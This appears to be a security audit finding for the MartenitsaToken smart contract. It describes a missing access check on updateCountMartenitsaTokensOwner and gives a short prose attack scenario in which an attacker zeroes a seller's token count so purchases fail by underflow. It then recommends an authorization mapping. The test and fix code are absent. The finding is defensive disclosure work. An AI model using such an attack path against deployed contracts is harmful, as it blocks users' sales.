The function MartenitsaToken::updateCountMartenitsaTokensOwner
in the MartenitsaToken
contract is currently accessible to all users. However, this function is critical as it updates the token count for specific addresses and should only be accessible by authorized users to prevent misuse.
User A
owns 1
token.
User A
lists the token for sale via MartenitsaMarketplace::listMartenitsaForSale
.
An attacker invokes the function to modify User A
token count to 0
.
Any attempts to purchase User A
token using MartenitsaMarketplace::buyMartenitsa
will fail due to an underflow in the token count.
Add the following code to "MartenitsaToken.t.sol" for simulation:
Unauthorized access could lead to potential abuse, threatening the stability of the entire contract system.
foundry
To address this vulnerability, we should implement an authorization check for callers of the MartenitsaToken::updateCountMartenitsaTokensOwner
function. For example, we could add a mapping to track authorized addresses and modify the function as follows:
This change ensures that only authorized addresses can modify token counts, enhancing the security and integrity of the contract.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.